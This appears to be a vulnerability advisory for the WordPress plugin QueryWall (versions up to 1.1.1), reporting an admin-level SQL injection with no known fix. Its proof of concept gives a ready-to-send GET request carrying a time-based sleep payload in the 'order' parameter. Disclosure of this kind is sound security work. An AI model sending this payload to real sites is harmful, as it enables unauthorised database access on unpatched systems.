WordPress Plugin Vulnerabilities

QueryWall: Plug'n Play Firewall <= 1.1.1 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

1. Send `GET /wp-admin/admin.php?page=querywall&orderby=date_time_gmt&order=desc%2c(select*from(select(sleep(20)))a)`
2. See SQL execution

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes

Timeline

Publicly Published
2023-05-26 (about 11 months ago)
Added
2023-05-26 (about 11 months ago)
Last Updated
2023-05-26 (about 11 months ago)

Other